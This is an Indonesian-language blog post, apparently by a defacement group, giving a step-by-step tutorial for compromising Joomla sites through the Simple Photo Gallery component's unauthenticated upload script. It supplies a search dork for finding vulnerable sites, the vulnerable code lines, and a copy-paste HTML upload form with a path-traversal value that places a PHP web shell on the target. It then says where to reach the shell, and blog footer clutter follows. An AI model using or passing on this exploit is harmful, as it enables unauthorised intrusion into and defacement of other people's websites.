Teest: Deface Joomla Simple Photo Gallery Shell Upload

Joomla Simple Photo Gallery Shell Upload

Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?
Visit Grub kami ^_^ -> Family Attack Cyber
Dork -> inurl:com_simplephotogallery
Exploit -> /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :

20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))

Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Enjoy Aje">
</form>
Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
Done ? Jangan lupa join grub nya cok !!! jika Gk paham mah :v
Family Attack Cyber

Teest

Deface Joomla Simple Photo Gallery Shell Upload

Joomla Simple Photo Gallery Shell Upload

Không có nhận xét nào:

Đăng nhận xét

Twelve Days of Christmas and More Christmas Songs | Nursery Rhymes

Báo cáo vi phạm

Nhãn